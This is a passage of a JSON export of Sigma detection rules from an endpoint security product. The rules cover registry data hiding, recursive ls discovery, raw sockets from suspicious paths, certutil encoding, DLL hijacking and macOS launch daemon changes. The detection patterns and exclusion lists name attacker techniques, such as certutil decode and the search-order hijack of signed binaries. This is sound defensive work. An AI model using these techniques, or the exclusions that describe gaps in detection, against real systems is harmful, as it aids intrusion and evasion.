exclusion_acdsystems:\n Image|endswith: '\\ACDSee??.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'ACD Systems International Inc'\n TargetObject|endswith: '\\SOFTWARE\\ACD Systems\\ACDSee\\\\*\\PrintOptions\\Presets\\PrintContactSheet\\Default\\strFtrText'\n\n exclusion_outlook:\n ProcessOriginalFileName: 'Outlook.exe'\n TargetObject:\n - 'HKU\\S-*\\SOFTWARE\\Microsoft\\Office\\\\*\\Outlook\\Profiles\\Outlook\\\\*\\Reply-Forward Signature'\n - 'HKU\\S-*\\SOFTWARE\\Microsoft\\Office\\\\*\\Outlook\\Profiles\\Outlook\\\\*\\New Signature'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\n#level: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "01833e69-127a-4ff4-a998-d4decbae548f",
"rule_name": "Possible Hidden Registry Data Created",
"rule_description": "Detects an attempt to hide data in the Registry by adding multiple spaces at the beginning of a value.\nAdversaries often manipulate the Windows Registry by adding spaces to obscure data, hide configurations, or remove evidence.\nIt is recommended to investigate the source of the registry modification, and check for related events that may indicate unauthorized access or malicious activity.\n",
"rule_creation_date": "2021-10-08",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "01ce3d93-1705-4c9f-a0f9-4c0e16af130b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.613285Z",
"creation_date": "2026-03-23T11:45:34.613289Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.613296Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1083/",
"https://attack.mitre.org/techniques/T1005/"
],
"name": "t1083_recursive_ls_linux.yml",
"content": "title: File and Directory Discovered via ls\nid: 01ce3d93-1705-4c9f-a0f9-4c0e16af130b\ndescription: |\n Detects the execution of ls with special arguments that may be used for file and directory discovery.\n Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1083/\n - https://attack.mitre.org/techniques/T1005/\ndate: 2022/12/01\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1083\n - attack.t1005\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/ls'\n\n # When the agent is under a lot of pressure, the parent information of a process can be missing.\n # Exceptionnaly for this rule, because it triggers so frequently with a low severity, we will ignore\n # its instances where the parent is missing.\n # When the parent is missing, the ParentImage or ParentCommandLine field is also missing (it is not empty or null)\n # so we can't easily match against that.\n # Instead, we reverse the problem by requiring the ParentImage fields to contain a `\\`.\n ParentImage|contains: '\\'\n\n selection_recursive:\n CommandLine|contains:\n - ' -R'\n - ' -?R'\n - ' -??R'\n - ' -???R'\n - ' -????R'\n - ' -?????R'\n\n selection_arg_all:\n CommandLine|contains:\n - ' -a'\n - ' -?a'\n - ' -??a'\n - ' -???a'\n - ' -????a'\n - ' -?????a'\n selection_arg_l:\n CommandLine|contains:\n - ' -l'\n - ' -?l'\n - ' -??l'\n - ' -???l'\n - ' -????l'\n - ' -?????l'\n\n exclusion_commandline:\n CommandLine:\n - '* --color=auto *'\n - 'ls --color=auto'\n - '* --color=tty *'\n - 'ls --color=tty'\n - 'ls --color -d .'\n - 'ls -? /proc/*'\n - 'ls -?? /proc/*'\n - 'ls -? /usr/*'\n - 'ls -? /var/*'\n - 'ls -?? /var/*'\n - 'ls -?? /run/*'\n - '/bin/ls -? /proc/*'\n - '/bin/ls -?? /proc/*'\n - '/bin/ls -? /usr/*'\n - '/bin/ls -? /var/*'\n - '/bin/ls -?? /var/*'\n - '/bin/ls -ld /run/*'\n - 'ls -l libreoffice'\n - '/bin/ls -l ./jre/bin/java'\n\n exclusion_qualys1:\n - GrandparentImage: '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n - CommandLine:\n - '*/qualys/cloud-agent/*'\n - 'ls -ltr /var/log/qualys/*'\n exclusion_qualys2:\n CommandLine: 'ls -ld /root'\n ParentImage: '/usr/bin/bash'\n GrandparentImage: '/usr/bin/bash'\n exclusion_qualys3:\n GrandparentImage: '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n CommandLine|startswith: 'ls -ld /root/'\n\n exclusion_bladelogic:\n ParentImage: '/opt/bmc/bladelogic/RSCD/bin/rscd_full'\n\n exclusion_ransomguard:\n CommandLine: 'ls -ld /root/.ransomguard.???'\n\n condition: selection and selection_recursive and 1 of selection_arg_* and not 1 of exclusion_*\nlevel: low\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "01ce3d93-1705-4c9f-a0f9-4c0e16af130b",
"rule_name": "File and Directory Discovered via ls",
"rule_description": "Detects the execution of ls with special arguments that may be used for file and directory discovery.\nAdversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2022-12-01",
"rule_modified_date": "2025-01-28",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1005",
"attack.t1083"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "01cf0e26-1674-4236-aa42-024891c8915c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085708Z",
"creation_date": "2026-03-23T11:45:34.085710Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085714Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/",
"https://man7.org/linux/man-pages/man7/raw.7.html",
"https://man7.org/linux/man-pages/man7/packet.7.html",
"https://attack.mitre.org/techniques/T1095/",
"https://attack.mitre.org/techniques/T1040/"
],
"name": "t1095_rawsocket_suspicious_path.yml",
"content": "title: Raw Socket Created From Suspicious Path\nid: 01cf0e26-1674-4236-aa42-024891c8915c\ndescription: |\n Detects the creation of a raw socket from a suspicious path.\n Raw sockets are a special kind of socket that allow deep manipulation of network packets, either for inspection, filtering, custom protocols or packet forging.\n It may hint at a malware trying to hide its traffic without having to open a port or using a custom protocol to communicate with its C2.\n It is recommended to ensure the process who created this raw socket had a legitimate reason to do so and that the host wasn't compromised.\nreferences:\n - https://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/\n - https://man7.org/linux/man-pages/man7/raw.7.html\n - https://man7.org/linux/man-pages/man7/packet.7.html\n - https://attack.mitre.org/techniques/T1095/\n - https://attack.mitre.org/techniques/T1040/\ndate: 2024/02/02\nmodified: 2026/02/25\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1095\n - attack.defense_evasion\n - attack.persistence\n - attack.t1205.001\n - attack.t1572\n - attack.credential_access\n - attack.discovery\n - attack.t1040\n - classification.Linux.Source.NetworkActivity\n - classification.Linux.Behavior.NetworkActivity\n - classification.Linux.Behavior.CommandAndControl\nlogsource:\n category: network_rawsocket\n product: linux\ndetection:\n\n selection:\n # Ensure that events without a process do not trigger this rule.\n # This happens typically when the agent is overloaded.\n ProcessImage|startswith:\n - '/'\n - 'memfd:'\n ProcessAncestors|contains: '?'\n\n # Filter common \"good\" directories to only retain the suspicious ones (/home, /tmp, /run, etc.)\n filter_system_directories:\n ProcessImage|startswith:\n - '/bin/'\n - '/sbin/'\n - '/usr/bin/'\n - '/usr/sbin/'\n - '/usr/local/'\n - '/opt/'\n - '/lib/'\n - '/lib64/'\n - '/usr/lib/'\n - '/usr/lib64/'\n - '/usr/libexec/'\n - '/usr/share/'\n - '/snap/'\n - '/var/lib/snapd/snap/'\n - '/nix/store/*/bin/'\n - '/nix/store/*/libexec/'\n\n exclusion_k3s:\n ProcessImage|startswith: '/var/lib/rancher/k3s/data/*/bin/'\n\n exclusion_container:\n - ProcessParentImage:\n - '/usr/bin/containerd-shim-runc-v2'\n - '/opt/containerd/bin/containerd-shim-runc-v2'\n - '/usr/local/bin/containerd-shim-runc-v2'\n - ProcessAncestors|contains:\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/opt/containerd/bin/containerd-shim-runc-v2|'\n - '|/usr/local/bin/containerd-shim-runc-v2|'\n\n exclusion_u01:\n ProcessImage:\n - '/u01/app/*/bin/cping'\n - '/u01/app/*/bin/acquisition'\n - '/u01/app/*/bin/gyrophare'\n - '/u01/app/*/bin/orarootagent.bin'\n\n exclusion_tina:\n ProcessImage:\n - '*/tina/Bin/.tina_ping.real'\n - '/usr/Atempo/tina/Bin/*'\n - '/usr/Atempo/TimeNavigator/*'\n\n exclusion_devolonetsv:\n # /var/lib/devolonetsvc/updates/firmware/devolo-firmware-qca7420/avupdate\n ProcessImage: '/var/lib/devolonetsvc/updates/firmware/devolo-firmware-*/avupdate'\n\n exclusion_openprocess:\n ProcessImage: '/usr/openprocess/*/bin/ops?server'\n\n exclusion_hlab:\n ProcessImage|endswith: '/hl-ebpf-sweeper'\n\n exclusion_lacework_datacollector:\n # /var/lib/lacework/6.11.0.21858/datacollector\n # /var/lib/lacework/6.7.6.19823/datacollector\n ProcessImage: '/var/lib/lacework/*/datacollector'\n\n exclusion_azure_networkwatcher:\n # /var/lib/waagent/Microsoft.Azure.NetworkWatcher.NetworkWatcherAgentLinux-1.4.3320.1/amd64/NetworkWatcherAgent\n ProcessImage: '/var/lib/waagent/Microsoft.Azure.NetworkWatcher.NetworkWatcherAgentLinux-*/*/NetworkWatcherAgent'\n\n exclusion_ibm_hsm:\n ProcessImage:\n - '/usr/lpp/mmfs/bin/mmcmi'\n - '/usr/lpp/mmfs/bin/mmfsd'\n - '/usr/lpp/mmfs/libexec/ctdb/ctdb_killtcp'\n\n exclusion_veritas:\n ProcessImage:\n - '/usr/openv/volmgr/bin/avrd'\n - '/usr/openv/volmgr/bin/tldd'\n\n exclusion_nexpose_vulnscanner:\n ProcessCurrentDirectory: '/data/rapid7/nexpose/nsc/'\n\n exclusion_container_iptables:\n ProcessAncestors|contains: '/usr/bin/containerd'\n ProcessCommandLine:\n - '/system/bin/ip6tables-restore --noflush -w -v'\n - '/system/bin/iptables-restore --noflush -w -v'\n\n exclusion_uv_python:\n ProcessImage|contains: '/.local/share/uv/python/'\n\n exclusion_cortex:\n ProcessCommandLine: '/opt/traps/bin/pmd'\n\n exclusion_sensugo:\n ProcessAncestors|contains:\n - '|/opt/sensugo/bin/sensu-agent.v*|'\n - '|/opt/sensugo/bin/sensu-backend.v*|'\n\n exclusion_zygote:\n ProcessParentImage: '/system/bin/app_process64'\n\n exclusion_icsscand:\n ProcessImage|endswith: '/icsscand/build/libicsneo-socketcan-daemon'\n\n exclusion_iptables:\n ProcessImage: '/system/bin/iptables'\n\n exclusion_zig_benchmark:\n ProcessCommandLine: 'zig-out/bin/benchmark'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "01cf0e26-1674-4236-aa42-024891c8915c",
"rule_name": "Raw Socket Created From Suspicious Path",
"rule_description": "Detects the creation of a raw socket from a suspicious path.\nRaw sockets are a special kind of socket that allow deep manipulation of network packets, either for inspection, filtering, custom protocols or packet forging.\nIt may hint at a malware trying to hide its traffic without having to open a port or using a custom protocol to communicate with its C2.\nIt is recommended to ensure the process who created this raw socket had a legitimate reason to do so and that the host wasn't compromised.\n",
"rule_creation_date": "2024-02-02",
"rule_modified_date": "2026-02-25",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.credential_access",
"attack.defense_evasion",
"attack.discovery",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1040",
"attack.t1095",
"attack.t1205.001",
"attack.t1572"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "01f3ffc6-8407-4fda-972a-7d8066ec1e3b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078393Z",
"creation_date": "2026-03-23T11:45:34.078395Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078400Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Certutil/",
"https://attack.mitre.org/techniques/T1140/"
],
"name": "t1140_certutil_encoding_usage.yml",
"content": "title: Certutil Used for Encoding\nid: 01f3ffc6-8407-4fda-972a-7d8066ec1e3b\ndescription: |\n Detects the execution of certutil.exe to decode or encode data.\n This is often used by attackers to decode binaries hidden inside certificate files as Base64 or Hexadecimal information.\n It is recommended to check the content of the written file and the activity of the parent process for malicious behavior.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Certutil/\n - https://attack.mitre.org/techniques/T1140/\ndate: 2021/05/27\nmodified: 2025/02/13\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.s0160\n - attack.t1140\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Certutil\n - classification.Windows.Behavior.Obfuscation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\certutil.exe'\n # Renamed binaries\n - OriginalFileName: 'CertUtil.exe'\n\n selection_cmd:\n CommandLine|contains:\n # Decode to BASE64\n - ' -decode '\n - ' /decode '\n\n # Encode to BASE64\n - ' -encode '\n - ' /encode '\n\n # Decode from hexadecimal\n - ' -decodehex '\n - ' /decodehex '\n\n # Encode to hexadecimal\n - ' -encodehex '\n - ' /encodehex '\n\n exclusion_glpi1:\n # GLPI-Agent keystore-export\n CommandLine: 'certutil -encode *.crt temp.cer'\n # C:\\Program Files\\GLPI-Agent\\perl\\bin\\glpi-agent.exe\n GrandparentImage|endswith: '\\glpi-agent.exe'\n\n exclusion_glpi2:\n # GLPI-Agent keystore-export\n CommandLine:\n - 'certutil -encode *.crt temp.cer'\n - 'certutil -encode *.crt temp.cer ?'\n # C:\\Program Files\\GLPI-Agent\\perl\\bin\\glpi-agent.exe\n CurrentDirectory: '?:\\Program Files\\GLPI-Agent\\var\\keystore-export-*\\'\n\n exclusion_pfu_scansnap:\n ProcessGrandparentImage:\n - '?:\\Program Files (x86)\\PFU\\ScanSnap\\Home\\SshRegister.exe'\n - '?:\\Program Files (x86)\\PFU\\ScanSnap\\Driver\\PfuSsMon.exe'\n ProcessCommandLine: 'certutil -encodehex -f * content.json 1'\n\n exclusion_centralstage:\n ProcessGrandparentImage: '?:\\ProgramData\\CentraStage\\AEMAgent\\AEMAgent.exe'\n ProcessCommandLine: 'certutil -decode getsignatureinfo.base64 getsignatureinfo.ps1'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "01f3ffc6-8407-4fda-972a-7d8066ec1e3b",
"rule_name": "Certutil Used for Encoding",
"rule_description": "Detects the execution of certutil.exe to decode or encode data.\nThis is often used by attackers to decode binaries hidden inside certificate files as Base64 or Hexadecimal information.\nIt is recommended to check the content of the written file and the activity of the parent process for malicious behavior.\n",
"rule_creation_date": "2021-05-27",
"rule_modified_date": "2025-02-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1140"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "022246ff-42f6-4d06-8173-3c88a407926a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.592360Z",
"creation_date": "2026-03-23T11:45:34.592363Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.592371Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_ie4uinit.yml",
"content": "title: DLL Hijacking via ie4uinit.exe\nid: 022246ff-42f6-4d06-8173-3c88a407926a\ndescription: |\n Detects potential Windows DLL Hijacking via ie4uinit.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ie4uinit.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.DLL'\n - '\\IEADVPACK.dll'\n - '\\iedkcs32.dll'\n - '\\MLANG.dll'\n - '\\netapi32.dll'\n - '\\netutils.dll'\n - '\\urlmon.dll'\n - '\\WININET.dll'\n - '\\wkscli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "022246ff-42f6-4d06-8173-3c88a407926a",
"rule_name": "DLL Hijacking via ie4uinit.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ie4uinit.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0247bb14-5962-4133-9181-cb2f419787f1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093612Z",
"creation_date": "2026-03-23T11:45:34.093614Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093619Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1543/004/"
],
"name": "t1543_004_launch_daemons_modified.yml",
"content": "title: Launch Daemon Modified\nid: 0247bb14-5962-4133-9181-cb2f419787f1\ndescription: |\n Detects a modification of a launch daemon.\n Adversaries may modify existing launch daemons in order to install a backdoor.\n It is recommended to check if the process making the modification has legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1543/004/\ndate: 2024/06/18\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1543.004\n - attack.defense_evasion\n - attack.t1647\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Persistence\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n\n selection_process:\n ProcessImage|contains: '?'\n\n selection_kind_write:\n Kind: 'write'\n Path|startswith:\n - '/System/Library/LaunchDaemons/'\n - '/Library/LaunchDaemons/'\n\n selection_kind_rename:\n Kind: 'rename'\n TargetPath|startswith:\n - '/System/Library/LaunchDaemons/'\n - '/Library/LaunchDaemons/'\n\n filter_nosync:\n Path|contains: '.dat.nosync'\n\n filter_ds_store:\n Path|endswith: '/.DS_Store'\n\n exclusion_vim:\n Image: '/usr/bin/vim'\n\n exclusion_jamf:\n - Image: '/usr/local/jamf/bin/jamf'\n - ProcessGrandparentImage: '/usr/local/jamf/bin/jamf'\n - ProcessGrandparentCommandLine|contains: '/Library/Application Support/JAMF/tmp/'\n\n exclusion_installer:\n - ProcessCommandLine|startswith:\n - '/bin/bash /tmp/PKInstallSandbox.??????/'\n - '/bin/sh /tmp/PKInstallSandbox.??????/'\n - '/bin/bash /tmp/pkinstallsandbox.??????/scripts/'\n - ProcessParentCommandLine|startswith:\n - '/bin/bash /tmp/PKInstallSandbox.??????/'\n - '/bin/sh /tmp/PKInstallSandbox.??????/'\n - '/bin/bash /tmp/pkinstallsandbox.??????/scripts/'\n\n # used by a lot of installer\n exclusion_cp:\n Image: '/bin/cp'\n\n exclusion_bomgar:\n ProcessCommandLine|startswith:\n - '/bin/bash /Library/LaunchDaemons/.com.bomgar.bomgar-ps-*/mac_service_helper.sh'\n - '/Library/LaunchDaemons/.com.bomgar.bomgar-ps-*.helper/run.state'\n\n exclusion_desktop_services_priv:\n ProcessCommandLine:\n - '/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper'\n - '/system/library/privateframeworks/desktopservicespriv.framework/versions/a/resources/desktopserviceshelper'\n\n exclusion_finder:\n Image: '/system/library/coreservices/finder.app/contents/macos/finder'\n\n exclusion_common_folders:\n ProcessImage|startswith:\n - '/Applications/'\n - '/Library/'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n - '/private/var/folders/??/*/?/AppTranslocation/'\n\n exclusion_eset:\n ProcessGrandparentImage: '/Applications/ESET Endpoint Security.app/Contents/MacOS/execd'\n\n exclusion_rsync:\n Image: '/usr/bin/rsync'\n\n condition: selection_version and selection_process and 1 of selection_kind_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0247bb14-5962-4133-9181-cb2f419787f1",
"rule_name": "Launch Daemon Modified",
"rule_description": "Detects a modification of a launch daemon.\nAdversaries may modify existing launch daemons in order to install a backdoor.\nIt is recommended to check if the process making the modification has legitimate reasons to do so.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1543.004",
"attack.t1647"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "027c5f6b-cba7-426c-af04-233b87967507",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.593375Z",
"creation_date": "2026-03-23T11:45:34.593378Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.593386Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_vssadmin.yml",
"content": "title: DLL Hijacking via vssadmin.exe\nid: 027c5f6b-cba7-426c-af04-233b87967507\ndescription: |\n Detects potential Windows DLL Hijacking via vssadmin.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - 